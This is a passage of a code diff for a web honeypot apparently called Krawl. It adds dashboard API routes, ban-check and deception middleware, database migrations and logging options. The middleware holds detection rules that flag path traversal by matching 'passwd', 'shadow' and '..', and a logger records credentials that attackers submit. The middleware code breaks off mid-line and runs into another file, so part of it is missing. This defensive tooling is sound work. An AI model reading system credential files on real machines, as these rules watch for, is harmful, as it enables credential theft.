paginated honeypot triggers - if self.config.dashboard_secret_path and self.path.startswith( - f"{self.config.dashboard_secret_path}/api/honeypot" - ): - self.send_response(200) - self.send_header("Content-type", "application/json") - self.send_header("Access-Control-Allow-Origin", "*") - self.send_header( - "Cache-Control", "no-store, no-cache, must-revalidate, max-age=0" - ) - self.send_header("Pragma", "no-cache") - self.send_header("Expires", "0") - self.end_headers() - try: - from database import get_database - import json - from urllib.parse import urlparse, parse_qs - - db = get_database() - parsed_url = urlparse(self.path) - query_params = parse_qs(parsed_url.query) - 
page = int(query_params.get("page", ["1"])[0]) - page_size = int(query_params.get("page_size", ["5"])[0]) - sort_by = query_params.get("sort_by", ["count"])[0] - sort_order = query_params.get("sort_order", ["desc"])[0] - - page = max(1, page) - page_size = min(max(1, page_size), 100) - - result = db.get_honeypot_paginated( - page=page, - page_size=page_size, - sort_by=sort_by, - sort_order=sort_order, - ) - self.wfile.write(json.dumps(result).encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error fetching honeypot data: {e}") - self.wfile.write(json.dumps({"error": str(e)}).encode()) - return - - # API endpoint for paginated credentials - if self.config.dashboard_secret_path and self.path.startswith( - f"{self.config.dashboard_secret_path}/api/credentials" - ): - self.send_response(200) - self.send_header("Content-type", "application/json") - self.send_header("Access-Control-Allow-Origin", "*") - self.send_header( - "Cache-Control", "no-store, no-cache, must-revalidate, max-age=0" - ) - self.send_header("Pragma", "no-cache") - self.send_header("Expires", "0") - self.end_headers() - try: - from database import get_database - import json - from urllib.parse import urlparse, parse_qs - - db = get_database() - parsed_url = urlparse(self.path) - query_params = parse_qs(parsed_url.query) - page = int(query_params.get("page", ["1"])[0]) - page_size = int(query_params.get("page_size", ["5"])[0]) - sort_by = query_params.get("sort_by", ["timestamp"])[0] - sort_order = query_params.get("sort_order", ["desc"])[0] - - page = max(1, page) - page_size = min(max(1, page_size), 100) - - result = db.get_credentials_paginated( - page=page, - page_size=page_size, - sort_by=sort_by, - sort_order=sort_order, - ) - self.wfile.write(json.dumps(result).encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error fetching credentials: {e}") - self.wfile.write(json.dumps({"error": str(e)}).encode()) - return 
- - # API endpoint for paginated top IPs - if self.config.dashboard_secret_path and self.path.startswith( - f"{self.config.dashboard_secret_path}/api/top-ips" - ): - self.send_response(200) - self.send_header("Content-type", "application/json") - self.send_header("Access-Control-Allow-Origin", "*") - self.send_header( - "Cache-Control", "no-store, no-cache, must-revalidate, max-age=0" - ) - self.send_header("Pragma", "no-cache") - self.send_header("Expires", "0") - self.end_headers() - try: - from database import get_database - import json - from urllib.parse import urlparse, parse_qs - - db = get_database() - parsed_url = urlparse(self.path) - query_params = parse_qs(parsed_url.query) - page = int(query_params.get("page", ["1"])[0]) - page_size = int(query_params.get("page_size", ["5"])[0]) - sort_by = query_params.get("sort_by", ["count"])[0] - sort_order = query_params.get("sort_order", ["desc"])[0] - - page = max(1, page) - page_size = min(max(1, page_size), 100) - - result = db.get_top_ips_paginated( - page=page, - page_size=page_size, - sort_by=sort_by, - sort_order=sort_order, - ) - self.wfile.write(json.dumps(result).encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error fetching top IPs: {e}") - self.wfile.write(json.dumps({"error": str(e)}).encode()) - return - - # API endpoint for paginated top paths - if self.config.dashboard_secret_path and self.path.startswith( - f"{self.config.dashboard_secret_path}/api/top-paths" - ): - self.send_response(200) - self.send_header("Content-type", "application/json") - self.send_header("Access-Control-Allow-Origin", "*") - self.send_header( - "Cache-Control", "no-store, no-cache, must-revalidate, max-age=0" - ) - self.send_header("Pragma", "no-cache") - self.send_header("Expires", "0") - self.end_headers() - try: - from database import get_database - import json - from urllib.parse import urlparse, parse_qs - - db = get_database() - parsed_url = urlparse(self.path) - 
query_params = parse_qs(parsed_url.query) - page = int(query_params.get("page", ["1"])[0]) - page_size = int(query_params.get("page_size", ["5"])[0]) - sort_by = query_params.get("sort_by", ["count"])[0] - sort_order = query_params.get("sort_order", ["desc"])[0] - - page = max(1, page) - page_size = min(max(1, page_size), 100) - - result = db.get_top_paths_paginated( - page=page, - page_size=page_size, - sort_by=sort_by, - sort_order=sort_order, - ) - self.wfile.write(json.dumps(result).encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error fetching top paths: {e}") - self.wfile.write(json.dumps({"error": str(e)}).encode()) - return - - # API endpoint for paginated top user agents - if self.config.dashboard_secret_path and self.path.startswith( - f"{self.config.dashboard_secret_path}/api/top-user-agents" - ): - self.send_response(200) - self.send_header("Content-type", "application/json") - self.send_header("Access-Control-Allow-Origin", "*") - self.send_header( - "Cache-Control", "no-store, no-cache, must-revalidate, max-age=0" - ) - self.send_header("Pragma", "no-cache") - self.send_header("Expires", "0") - self.end_headers() - try: - from database import get_database - import json - from urllib.parse import urlparse, parse_qs - - db = get_database() - parsed_url = urlparse(self.path) - query_params = parse_qs(parsed_url.query) - page = int(query_params.get("page", ["1"])[0]) - page_size = int(query_params.get("page_size", ["5"])[0]) - sort_by = query_params.get("sort_by", ["count"])[0] - sort_order = query_params.get("sort_order", ["desc"])[0] - - page = max(1, page) - page_size = min(max(1, page_size), 100) - - result = db.get_top_user_agents_paginated( - page=page, - page_size=page_size, - sort_by=sort_by, - sort_order=sort_order, - ) - self.wfile.write(json.dumps(result).encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error fetching top user agents: {e}") - 
self.wfile.write(json.dumps({"error": str(e)}).encode()) - return - - # API endpoint for paginated attack types - if self.config.dashboard_secret_path and self.path.startswith( - f"{self.config.dashboard_secret_path}/api/attack-types" - ): - self.send_response(200) - self.send_header("Content-type", "application/json") - self.send_header("Access-Control-Allow-Origin", "*") - self.send_header( - "Cache-Control", "no-store, no-cache, must-revalidate, max-age=0" - ) - self.send_header("Pragma", "no-cache") - self.send_header("Expires", "0") - self.end_headers() - try: - from database import get_database - import json - from urllib.parse import urlparse, parse_qs - - db = get_database() - parsed_url = urlparse(self.path) - query_params = parse_qs(parsed_url.query) - page = int(query_params.get("page", ["1"])[0]) - page_size = int(query_params.get("page_size", ["5"])[0]) - sort_by = query_params.get("sort_by", ["timestamp"])[0] - sort_order = query_params.get("sort_order", ["desc"])[0] - - page = max(1, page) - page_size = min(max(1, page_size), 100) - - result = db.get_attack_types_paginated( - page=page, - page_size=page_size, - sort_by=sort_by, - sort_order=sort_order, - ) - self.wfile.write(json.dumps(result).encode()) - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error fetching attack types: {e}") - self.wfile.write(json.dumps({"error": str(e)}).encode()) - return - - # API endpoint for downloading malicious IPs file - if ( - self.config.dashboard_secret_path - and self.path - == f"{self.config.dashboard_secret_path}/api/download/malicious_ips.txt" - ): - import os - - file_path = os.path.join( - os.path.dirname(__file__), "exports", "malicious_ips.txt" - ) - try: - if os.path.exists(file_path): - with open(file_path, "rb") as f: - content = f.read() - self.send_response(200) - self.send_header("Content-type", "text/plain") - self.send_header( - "Content-Disposition", - 'attachment; filename="malicious_ips.txt"', - ) - 
self.send_header("Content-Length", str(len(content))) - self.end_headers() - self.wfile.write(content) - else: - self.send_response(404) - self.send_header("Content-type", "text/plain") - self.end_headers() - self.wfile.write(b"File not found") - except BrokenPipeError: - pass - except Exception as e: - self.app_logger.error(f"Error serving malicious IPs file: {e}") - self.send_response(500) - self.send_header("Content-type", "text/plain") - self.end_headers() - self.wfile.write(b"Internal server error") - return - - self.tracker.record_access(client_ip, self.path, user_agent, method="GET") - - # self.analyzer.infer_user_category(client_ip) - # self.analyzer.update_ip_rep_infos(client_ip) - - if self.tracker.is_suspicious_user_agent(user_agent): - self.access_logger.warning( - f"[SUSPICIOUS] {client_ip} - {user_agent[:50]} - {self.path}" - ) - - if self._should_return_error(): - error_code = self._get_random_error_code() - self.access_logger.info( - f"Returning error {error_code} to {client_ip} - {self.path}" - ) - self.send_response(error_code) - self.end_headers() - return - - if self.serve_special_path(self.path): - return - - time.sleep(self.config.delay / 1000.0) - self.send_response(200) - self.send_header("Content-type", "text/html") - self.end_headers() - - try: - # Increment page visit counter for this IP and get the current count - current_visit_count = self._increment_page_visit(client_ip) - self.wfile.write( - self.generate_page(self.path, current_visit_count).encode() - ) - - Handler.counter -= 1 - - if Handler.counter < 0: - Handler.counter = self.config.canary_token_tries - except BrokenPipeError: - # Client disconnected, ignore silently - pass - except Exception as e: - self.app_logger.error(f"Error generating page: {e}") - - def log_message(self, format, *args): - """Override to customize logging - uses access logger""" - client_ip = self._get_client_ip() - self.access_logger.info(f"{client_ip} - {format % args}") diff --git a/src/logger.py 
b/src/logger.py index 9762002..d556684 100644 --- a/src/logger.py +++ b/src/logger.py @@ -36,12 +36,13 @@ class LoggerManager: cls._instance._initialized = False return cls._instance - def initialize(self, log_dir: str = "logs") -> None: + def initialize(self, log_dir: str = "logs", log_level: str = "INFO") -> None: """ Initialize the logging system with rotating file handlers.loggers Args: log_dir: Directory for log files (created if not exists) + log_level: Logging level (DEBUG, INFO, WARNING, ERROR, CRITICAL) """ if self._initialized: return @@ -59,9 +60,11 @@ class LoggerManager: max_bytes = 1048576 # 1MB backup_count = 5 + level = getattr(logging, log_level.upper(), logging.INFO) + # Setup application logger self._app_logger = logging.getLogger("krawl.app") - self._app_logger.setLevel(logging.INFO) + self._app_logger.setLevel(level) self._app_logger.handlers.clear() app_file_handler = RotatingFileHandler( @@ -78,7 +81,7 @@ class LoggerManager: # Setup access logger self._access_logger = logging.getLogger("krawl.access") - self._access_logger.setLevel(logging.INFO) + self._access_logger.setLevel(level) self._access_logger.handlers.clear() access_file_handler = RotatingFileHandler( @@ -95,7 +98,7 @@ class LoggerManager: # Setup credential logger (special format, no stream handler) self._credential_logger = logging.getLogger("krawl.credentials") - self._credential_logger.setLevel(logging.INFO) + self._credential_logger.setLevel(level) self._credential_logger.handlers.clear() # Credential logger uses a simple format: timestamp|ip|username|password|path @@ -152,6 +155,6 @@ def get_credential_logger() -> logging.Logger: return _logger_manager.credentials -def initialize_logging(log_dir: str = "logs") -> None: +def initialize_logging(log_dir: str = "logs", log_level: str = "INFO") -> None: """Initialize the logging system.""" - _logger_manager.initialize(log_dir) + _logger_manager.initialize(log_dir, log_level) diff --git a/src/middleware/__init__.py 
b/src/middleware/__init__.py new file mode 100644 index 0000000..be27011 --- /dev/null +++ b/src/middleware/__init__.py @@ -0,0 +1,5 @@ +#!/usr/bin/env python3 + +""" +FastAPI middleware package for the Krawl honeypot. +""" diff --git a/src/middleware/ban_check.py b/src/middleware/ban_check.py new file mode 100644 index 0000000..a3be689 --- /dev/null +++ b/src/middleware/ban_check.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python3 + +""" +Middleware for checking if client IP is banned. +""" + +from starlette.middleware.base import BaseHTTPMiddleware +from starlette.requests import Request +from starlette.responses import Response + +from dependencies import get_client_ip + + +class BanCheckMiddleware(BaseHTTPMiddleware): + async def dispatch(self, request: Request, call_next): + # Skip ban check for dashboard routes + config = request.app.state.config + dashboard_prefix = "/" + config.dashboard_secret_path.lstrip("/") + if request.url.path.startswith(dashboard_prefix): + return await call_next(request) + + client_ip = get_client_ip(request) + tracker = request.app.state.tracker + + if tracker.is_banned_ip(client_ip): + return Response(status_code=500) + + response = await call_next(request) + return response diff --git a/src/middleware/deception.py b/src/middleware/deception.py new file mode 100644 index 0000000..6070a14 --- /dev/null +++ b/src/middleware/deception.py @@ -0,0 +1,102 @@ +#!/usr/bin/env python3 + +""" +Middleware for deception response detection (path traversal, XXE, command injection). +Short-circuits the request if a deception response is triggered. 
+""" + +import asyncio +from starlette.middleware.base import BaseHTTPMiddleware +from starlette.requests import Request +from starlette.responses import Response + +from deception_responses import detect_and_respond_deception +from dependencies import get_client_ip, build_raw_request +from logger import get_app_logger, get_access_logger + + +class DeceptionMiddleware(BaseHTTPMiddleware): + async def dispatch(self, request: Request, call_next): + path = request.url.path + + # Skip deception detection for dashboard routes + config = request.app.state.config + dashboard_prefix = "/" + config.dashboard_secret_path.lstrip("/") + if path.startswith(dashboard_prefix): + return await call_next(request) + + query = request.url.query or "" + method = request.method + + # Read body for POST requests + body = "" + if method == "POST": + body_bytes = await request.body() + body = body_bytes.decode("utf-8", errors="replace") + + result = detect_and_respond_deception(path, query, body, method) + + if result: + response_body, content_type, status_code = result + client_ip = get_client_ip(request) + user_agent = request.headers.get("User-Agent", "") + app_logger = get_app_logger() + access_logger = get_access_logger() + + # Determine attack type for logging + full_input = f"{path} {query} {body}".lower() + attack_type_log = "UNKNOWN" + + if ( + "passwd" in path.lower() + or "shadow" in path.lower() + or ".." in path + or ".." in query + ): + attack_type_log = "PATH_TRAVERSAL" + elif body and (" bool: + """Check if an index exists.""" + cursor.execute( + "SELECT name FROM sqlite_master WHERE type='index' AND name=?", (index_name,) + ) + return cursor.fetchone() is not None + + +def add_performance_indexes(db_path: str) -> bool: + """ + Add performance indexes to optimize queries. 
+ + Args: + db_path: Path to the SQLite database file + + Returns: + True if indexes were added or already exist, False on error + """ + try: + # Check if database exists + if not os.path.exists(db_path): + print(f"Database file not found: {db_path}") + return False + + # Connect to database + conn = sqlite3.connect(db_path) + cursor = conn.cursor() + + indexes_added = [] + indexes_existed = [] + + # Index 1: attack_type for efficient GROUP BY operations + if not index_exists(cursor, "ix_attack_detections_attack_type"): + print("Adding index on attack_detections.attack_type...") + cursor.execute(""" + CREATE INDEX ix_attack_detections_attack_type + ON attack_detections(attack_type) + """) + indexes_added.append("ix_attack_detections_attack_type") + else: + indexes_existed.append("ix_attack_detections_attack_type") + + # Index 2: Composite index for attack_type + access_log_id + if not index_exists(cursor, "ix_attack_detections_type_log"): + print( + "Adding composite index on attack_detections(attack_type, access_log_id)..." 
+ ) + cursor.execute(""" + CREATE INDEX ix_attack_detections_type_log + ON attack_detections(attack_type, access_log_id) + """) + indexes_added.append("ix_attack_detections_type_log") + else: + indexes_existed.append("ix_attack_detections_type_log") + + conn.commit() + conn.close() + + # Report results + if indexes_added: + print(f"Successfully added {len(indexes_added)} index(es):") + for idx in indexes_added: + print(f" - {idx}") + + if indexes_existed: + print(f"ℹ️ {len(indexes_existed)} index(es) already existed:") + for idx in indexes_existed: + print(f" - {idx}") + + if not indexes_added and not indexes_existed: + print("No indexes processed") + + return True + + except sqlite3.Error as e: + print(f"SQLite error: {e}") + return False + except Exception as e: + print(f"Unexpected error: {e}") + return False + + +def main(): + """Main migration function.""" + # Default database path + default_db_path = os.path.join( + os.path.dirname(os.path.dirname(__file__)), "data", "krawl.db" + ) + + # Allow custom path as command line argument + db_path = sys.argv[1] if len(sys.argv) > 1 else default_db_path + + print(f"Adding performance indexes to database: {db_path}") + print("=" * 60) + + success = add_performance_indexes(db_path) + + print("=" * 60) + if success: + print("Migration completed successfully") + print("\n💡 Performance tip: Run 'VACUUM' and 'ANALYZE' on your database") + print(" to optimize query planner statistics after adding indexes.") + sys.exit(0) + else: + print("Migration failed") + sys.exit(1) + + +if __name__ == "__main__": + main() diff --git a/src/migrations/add_raw_request_column.py b/src/migrations/add_raw_request_column.py new file mode 100644 index 0000000..81c3fd7 --- /dev/null +++ b/src/migrations/add_raw_request_column.py @@ -0,0 +1,93 @@ +#!/usr/bin/env python3 + +""" +Migration script to add raw_request column to access_logs table. +This script is safe to run multiple times - it checks if the column exists before adding it. 
+""" + +import sqlite3 +import sys +import os +from pathlib import Path + + +def column_exists(cursor, table_name: str, column_name: str) -> bool: + """Check if a column exists in a table.""" + cursor.execute(f"PRAGMA table_info({table_name})") + columns = [row[1] for row in cursor.fetchall()] + return column_name in columns + + +def add_raw_request_column(db_path: str) -> bool: + """ + Add raw_request column to access_logs table if it doesn't exist. + + Args: + db_path: Path to the SQLite database file + + Returns: + True if column was added or already exists, False on error + """ + try: + # Check if database exists + if not os.path.exists(db_path): + print(f"Database file not found: {db_path}") + return False + + # Connect to database + conn = sqlite3.connect(db_path) + cursor = conn.cursor() + + # Check if column already exists + if column_exists(cursor, "access_logs", "raw_request"): + print("Column 'raw_request' already exists in access_logs table") + conn.close() + return True + + # Add the column + print("Adding 'raw_request' column to access_logs table...") + cursor.execute(""" + ALTER TABLE access_logs + ADD COLUMN raw_request TEXT + """) + + conn.commit() + conn.close() + + print("✅ Successfully added 'raw_request' column to access_logs table") + return True + + except sqlite3.Error as e: + print(f"SQLite error: {e}") + return False + except Exception as e: + print(f"Unexpected error: {e}") + return False + + +def main(): + """Main migration function.""" + # Default database path + default_db_path = os.path.join( + os.path.dirname(os.path.dirname(__file__)), "data", "krawl.db" + ) + + # Allow custom path as command line argument + db_path = sys.argv[1] if len(sys.argv) > 1 else default_db_path + + print(f"🔄 Running migration on database: {db_path}") + print("=" * 60) + + success = add_raw_request_column(db_path) + + print("=" * 60) + if success: + print("Migration completed successfully") + sys.exit(0) + else: + print("Migration failed") + sys.exit(1) + + 
+if __name__ == "__main__": + main() diff --git a/src/migrations/runner.py b/src/migrations/runner.py new file mode 100644 index 0000000..7a74267 --- /dev/null +++ b/src/migrations/runner.py @@ -0,0 +1,127 @@ +""" +Migration runner for Krawl. +Checks the database schema and applies any pending migrations at startup. +All checks are idempotent — safe to run on every boot. + +Note: table creation (e.g. category_history) is already handled by +Base.metadata.create_all() in DatabaseManager.initialize() and is NOT +duplicated here. This runner only covers ALTER-level changes that +create_all() cannot apply to existing tables (new columns, new indexes). +""" + +import sqlite3 +import logging +from typing import List + +logger = logging.getLogger("krawl") + + +def _column_exists(cursor, table_name: str, column_name: str) -> bool: + cursor.execute(f"PRAGMA table_info({table_name})") + columns = [row[1] for row in cursor.fetchall()] + return column_name in columns + + +def _index_exists(cursor, index_name: str) -> bool: + cursor.execute( + "SELECT name FROM sqlite_master WHERE type='index' AND name=?", + (index_name,), + ) + return cursor.fetchone() is not None + + +def _migrate_raw_request_column(cursor) -> bool: + """Add raw_request column to access_logs if missing.""" + if _column_exists(cursor, "access_logs", "raw_request"): + return False + cursor.execute("ALTER TABLE access_logs ADD COLUMN raw_request TEXT") + return True + + +def _migrate_need_reevaluation_column(cursor) -> bool: + """Add need_reevaluation column to ip_stats if missing.""" + if _column_exists(cursor, "ip_stats", "need_reevaluation"): + return False + cursor.execute( + "ALTER TABLE ip_stats ADD COLUMN need_reevaluation BOOLEAN DEFAULT 0" + ) + return True + + +def _migrate_ban_state_columns(cursor) -> List[str]: + """Add ban/rate-limit columns to ip_stats if missing.""" + added = [] + columns = { + "page_visit_count": "INTEGER DEFAULT 0", + "ban_timestamp": "DATETIME", + "total_violations": "INTEGER 
DEFAULT 0", + "ban_multiplier": "INTEGER DEFAULT 1", + } + for col_name, col_type in columns.items(): + if not _column_exists(cursor, "ip_stats", col_name): + cursor.execute(f"ALTER TABLE ip_stats ADD COLUMN {col_name} {col_type}") + added.append(col_name) + return added + + +def _migrate_performance_indexes(cursor) -> List[str]: + """Add performance indexes to attack_detections if missing.""" + added = [] + if not _index_exists(cursor, "ix_attack_detections_attack_type"): + cursor.execute( + "CREATE INDEX ix_attack_detections_attack_type " + "ON attack_detections(attack_type)" + ) + added.append("ix_attack_detections_attack_type") + + if not _index_exists(cursor, "ix_attack_detections_type_log"): + cursor.execute( + "CREATE INDEX ix_attack_detections_type_log " + "ON attack_detections(attack_type, access_log_id)" + ) + added.append("ix_attack_detections_type_log") + + return added + + +def run_migrations(database_path: str) -> None: + """ + Check the database schema and apply any pending migrations. + + Only handles ALTER-level changes (columns, indexes) that + Base.metadata.create_all() cannot apply to existing tables. + + Args: + database_path: Path to the SQLite database file. 
+ """ + applied: List[str] = [] + + try: + conn = sqlite3.connect(database_path) + cursor = conn.cursor() + + if _migrate_raw_request_column(cursor): + applied.append("add raw_request column to access_logs") + + if _migrate_need_reevaluation_column(cursor): + applied.append("add need_reevaluation column to ip_stats") + + ban_cols = _migrate_ban_state_columns(cursor) + for col in ban_cols: + applied.append(f"add {col} column to ip_stats") + + idx_added = _migrate_performance_indexes(cursor) + for idx in idx_added: + applied.append(f"add index {idx}") + + conn.commit() + conn.close() + except sqlite3.Error as e: + logger.error(f"Migration error: {e}") + + if applied: + for m in applied: + logger.info(f"Migration applied: {m}") + logger.info(f"All migrations complete ({len(applied)} applied)") + else: + logger.info("Database schema is up to date — no migrations needed") diff --git a/src/models.py b/src/models.py index 2dbeb30..8fb6e26 100644 --- a/src/models.py +++ b/src/models.py @@ -63,6 +63,8 @@ class AccessLog(Base): timestamp: Mapped[datetime] = mapped_column( DateTime, nullable=False, default=datetime.utcnow, index=True ) + # Raw HTTP request for forensic analysis (nullable for backward compatibility) + raw_request: Mapped[Optional[str]] = mapped_column(String, nullable=True) # Relationship to attack detections attack_detections: Mapped[List["AttackDetection"]] = relationship( @@ -126,7 +128,7 @@ class AttackDetection(Base): nullable=False, index=True, ) - attack_type: Mapped[str] = mapped_column(String(50), nullable=False) + attack_type: Mapped[str] = mapped_column(String(50), nullable=False, index=True) matched_pattern: Mapped[Optional[str]] = mapped_column( String(MAX_ATTACK_PATTERN_LENGTH), nullable=True ) @@ -136,6 +138,11 @@ class AttackDetection(Base): "AccessLog", back_populates="attack_detections" ) + # Composite index for efficient aggregation queries + __table_args__ = ( + Index("ix_attack_detections_type_log", "attack_type", "access_log_id"), + ) + 
def __repr__(self) -> str: return f"" @@ -162,12 +169,20 @@ class IpStats(Base): # GeoIP fields (populated by future enrichment) country_code: Mapped[Optional[str]] = mapped_column(String(2), nullable=True) city: Mapped[Optional[str]] = mapped_column(String(MAX_CITY_LENGTH), nullable=True) + country: Mapped[Optional[str]] = mapped_column(String(100), nullable=True) + region: Mapped[Optional[str]] = mapped_column(String(2), nullable=True) + region_name: Mapped[Optional[str]] = mapped_column(String(100), nullable=True) + timezone: Mapped[Optional[str]] = mapped_column(String(50), nullable=True) + isp: Mapped[Optional[str]] = mapped_column(String(100), nullable=True) + reverse: Mapped[Optional[str]] = mapped_column(String(255), nullable=True) latitude: Mapped[Optional[float]] = mapped_column(Float, nullable=True) longitude: Mapped[Optional[float]] = mapped_column(Float, nullable=True) asn: Mapped[Optional[int]] = mapped_column(Integer, nullable=True) asn_org: Mapped[Optional[str]] = mapped_column( String(MAX_ASN_ORG_LENGTH), nullable=True ) + is_proxy: Mapped[Optional[bool]] = mapped_column(Boolean, nullable=True) + is_hosting: Mapped[Optional[bool]] = mapped_column(Boolean, nullable=True) list_on: Mapped[Optional[Dict[str, str]]] = mapped_column(JSON, nullable=True) # Reputation fields (populated by future enrichment) @@ -185,6 +200,15 @@ class IpStats(Base): category_scores: Mapped[Dict[str, int]] = mapped_column(JSON, nullable=True) manual_category: Mapped[bool] = mapped_column(Boolean, default=False, nullable=True) last_analysis: Mapped[datetime] = mapped_column(DateTime, nullable=True) + need_reevaluation: Mapped[bool] = mapped_column( + Boolean, default=False, nullable=True + ) + + # Ban/rate-limit state (moved from in-memory tracker to DB) + page_visit_count: Mapped[int] = mapped_column(Integer, default=0, nullable=True) + ban_timestamp: Mapped[Optional[datetime]] = mapped_column(DateTime, nullable=True) + total_violations: Mapped[int] = mapped_column(Integer, 
default=0, nullable=True) + ban_multiplier: Mapped[int] = mapped_column(Integer, default=1, nullable=True) def __repr__(self) -> str: return f"" diff --git a/src/routes/__init__.py b/src/routes/__init__.py new file mode 100644 index 0000000..01413b0 --- /dev/null +++ b/src/routes/__init__.py @@ -0,0 +1,5 @@ +#!/usr/bin/env python3 + +""" +FastAPI routes package for the Krawl honeypot. +""" diff --git a/src/routes/api.py b/src/routes/api.py new file mode 100644 index 0000000..d94b3b6 --- /dev/null +++ b/src/routes/api.py @@ -0,0 +1,319 @@ +#!/usr/bin/env python3 + +""" +Dashboard JSON API routes. +Migrated from handler.py dashboard API endpoints. +All endpoints are prefixed with the secret dashboard path. +""" + +import os + +from fastapi import APIRouter, Request, Response, Query +from fastapi.responses import JSONResponse, PlainTextResponse + +from dependencies import get_db +from logger import get_app_logger + +router = APIRouter() + + +def _no_cache_headers() -> dict: + return { + "Cache-Control": "no-store, no-cache, must-revalidate, max-age=0", + "Pragma": "no-cache", + "Expires": "0", + "Access-Control-Allow-Origin": "*", + } + + +@router.get("/api/all-ip-stats") +async def all_ip_stats(request: Request): + db = get_db() + try: + ip_stats_list = db.get_ip_stats(limit=500) + return JSONResponse( + content={"ips": ip_stats_list}, + headers=_no_cache_headers(), + ) + except Exception as e: + get_app_logger().error(f"Error fetching all IP stats: {e}") + return JSONResponse(content={"error": str(e)}, headers=_no_cache_headers()) + + +@router.get("/api/attackers") +async def attackers( + request: Request, + page: int = Query(1), + page_size: int = Query(25), + sort_by: str = Query("total_requests"), + sort_order: str = Query("desc"), +): + db = get_db() + page = max(1, page) + page_size = min(max(1, page_size), 100) + + try: + result = db.get_attackers_paginated( + page=page, page_size=page_size, sort_by=sort_by, sort_order=sort_order + ) + return 
JSONResponse(content=result, headers=_no_cache_headers()) + except Exception as e: + get_app_logger().error(f"Error fetching attackers: {e}") + return JSONResponse(content={"error": str(e)}, headers=_no_cache_headers()) + + +@router.get("/api/all-ips") +async def all_ips( + request: Request, + page: int = Query(1), + page_size: int = Query(25), + sort_by: str = Query("total_requests"), + sort_order: str = Query("desc"), +): + db = get_db() + page = max(1, page) + page_size = min(max(1, page_size), 10000) + + try: + result = db.get_all_ips_paginated( + page=page, page_size=page_size, sort_by=sort_by, sort_order=sort_order + ) + return JSONResponse(content=result, headers=_no_cache_headers()) + except Exception as e: + get_app_logger().error(f"Error fetching all IPs: {e}") + return JSONResponse(content={"error": str(e)}, headers=_no_cache_headers()) + + +@router.get("/api/ip-stats/{ip_address:path}") +async def ip_stats(ip_address: str, request: Request): + db = get_db() + try: + stats = db.get_ip_stats_by_ip(ip_address) + if stats: + return JSONResponse(content=stats, headers=_no_cache_headers()) + else: + return JSONResponse( + content={"error": "IP not found"}, headers=_no_cache_headers() + ) + except Exception as e: + get_app_logger().error(f"Error fetching IP stats: {e}") + return JSONResponse(content={"error": str(e)}, headers=_no_cache_headers()) + + +@router.get("/api/honeypot") +async def honeypot( + request: Request, + page: int = Query(1), + page_size: int = Query(5), + sort_by: str = Query("count"), + sort_order: str = Query("desc"), +): + db = get_db() + page = max(1, page) + page_size = min(max(1, page_size), 100) + + try: + result = db.get_honeypot_paginated( + page=page, page_size=page_size, sort_by=sort_by, sort_order=sort_order + ) + return JSONResponse(content=result, headers=_no_cache_headers()) + except Exception as e: + get_app_logger().error(f"Error fetching honeypot data: {e}") + return JSONResponse(content={"error": str(e)}, 
headers=_no_cache_headers()) + + +@router.get("/api/credentials") +async def credentials( + request: Request, + page: int = Query(1), + page_size: int = Query(5), + sort_by: str = Query("timestamp"), + sort_order: str = Query("desc"), +): + db = get_db() + page = max(1, page) + page_size = min(max(1, page_size), 100) + + try: + result = db.get_credentials_paginated( + page=page, page_size=page_size, sort_by=sort_by, sort_order=sort_order + ) + return JSONResponse(content=result, headers=_no_cache_headers()) + except Exception as e: + get_app_logger().error(f"Error fetching credentials: {e}") + return JSONResponse(content={"error": str(e)}, headers=_no_cache_headers()) + + +@router.get("/api/top-ips") +async def top_ips( + request: Request, + page: int = Query(1), + page_size: int = Query(5), + sort_by: str = Query("count"), + sort_order: str = Query("desc"), +): + db = get_db() + page = max(1, page) + page_size = min(max(1, page_size), 100) + + try: + result = db.get_top_ips_paginated( + page=page, page_size=page_size, sort_by=sort_by, sort_order=sort_order + ) + return JSONResponse(content=result, headers=_no_cache_headers()) + except Exception as e: + get_app_logger().error(f"Error fetching top IPs: {e}") + return JSONResponse(content={"error": str(e)}, headers=_no_cache_headers()) + + +@router.get("/api/top-paths") +async def top_paths( + request: Request, + page: int = Query(1), + page_size: int = Query(5), + sort_by: str = Query("count"), + sort_order: str = Query("desc"), +): + db = get_db() + page = max(1, page) + page_size = min(max(1, page_size), 100) + + try: + result = db.get_top_paths_paginated( + page=page, page_size=page_size, sort_by=sort_by, sort_order=sort_order + ) + return JSONResponse(content=result, headers=_no_cache_headers()) + except Exception as e: + get_app_logger().error(f"Error fetching top paths: {e}") + return JSONResponse(content={"error": str(e)}, headers=_no_cache_headers()) + + +@router.get("/api/top-user-agents") +async def 
top_user_agents( + request: Request, + page: int = Query(1), + page_size: int = Query(5), + sort_by: str = Query("count"), + sort_order: str = Query("desc"), +): + db = get_db() + page = max(1, page) + page_size = min(max(1, page_size), 100) + + try: + result = db.get_top_user_agents_paginated( + page=page, page_size=page_size, sort_by=sort_by, sort_order=sort_order + ) + return JSONResponse(content=result, headers=_no_cache_headers()) + except Exception as e: + get_app_logger().error(f"Error fetching top user agents: {e}") + return JSONResponse(content={"error": str(e)}, headers=_no_cache_headers()) + + +@router.get("/api/attack-types-stats") +async def attack_types_stats( + request: Request, + limit: int = Query(20), + ip_filter: str = Query(None), +): + db = get_db() + limit = min(max(1, limit), 100) + + try: + result = db.get_attack_types_stats(limit=limit, ip_filter=ip_filter) + return JSONResponse(content=result, headers=_no_cache_headers()) + except Exception as e: + get_app_logger().error(f"Error fetching attack types stats: {e}") + return JSONResponse(content={"error": str(e)}, headers=_no_cache_headers()) + + +@router.get("/api/attack-types") +async def attack_types( + request: Request, + page: int = Query(1), + page_size: int = Query(5), + sort_by: str = Query("timestamp"), + sort_order: str = Query("desc"), +): + db = get_db() + page = max(1, page) + page_size = min(max(1, page_size), 100) + + try: + result = db.get_attack_types_paginated( + page=page, page_size=page_size, sort_by=sort_by, sort_order=sort_order + ) + return JSONResponse(content=result, headers=_no_cache_headers()) + except Exception as e: + get_app_logger().error(f"Error fetching attack types: {e}") + return JSONResponse(content={"error": str(e)}, headers=_no_cache_headers()) + + +@router.get("/api/raw-request/{log_id:int}") +async def raw_request(log_id: int, request: Request): + db = get_db() + try: + raw = db.get_raw_request_by_id(log_id) + if raw is None: + return JSONResponse( + 
